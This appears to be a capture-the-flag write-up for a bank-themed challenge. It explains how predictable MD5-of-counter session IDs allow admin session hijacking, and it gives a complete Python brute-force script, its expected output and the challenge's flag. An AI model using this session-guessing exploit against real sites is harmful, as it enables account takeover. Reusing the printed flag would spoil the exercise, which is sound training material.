Trustfall Bank – TOKEN5
Token: PCCC{Welcome_Admin_pI_4120}
Background
Session IDs are MD5s of an incrementing counter in TinyDB. Brute-forcing
md5(1..50) as session_id hits the live admin session; visiting admin pages
yields the token.
From Nothing to Working
- Review source: session IDs derive from an incrementing counter hashed with MD5.
- Iterate
md5(1..50)assession_idcookies against/dashboard. - When admin pages load without redirect, scrape for
PCCC{...}to capture the token.
Command
python3 token5_admin_session.py
#!/usr/bin/env python3
# token5_admin_session.py
import hashlib, requests, re
TARGET = "http://trustfallbank.us"
def md5(n): return hashlib.md5(str(n).encode()).hexdigest()
def main():
admin_paths = ["/dashboard", "/admin", "/admin/flag", "/flag"]
for i in range(1, 50):
sid = md5(i)
s = requests.Session()
s.cookies.set("session_id", sid)
resp = s.get(f"{TARGET}/dashboard", allow_redirects=True)
if "admin" in resp.text.lower() and "login" not in resp.url:
print(f"[+] Admin session found: counter={i}, sid={sid}")
for path in admin_paths:
r = s.get(f"{TARGET}{path}")
m = re.search(r"PCCC\{[^}]+\}", r.text)
if m:
print(f"[+] TOKEN 5: {m.group()} (from {path})")
return
print("[!] Admin session found but token not visible; check pages manually.")
return
if i % 10 == 0:
print(f"[*] Tried {i} session IDs...")
print("[-] Admin session not found in first 50 IDs")
if __name__ == "__main__":
main()
Expected Output
[+] Admin session found: counter=... sid=...
[+] TOKEN 5: PCCC{Welcome_Admin_pI_4120}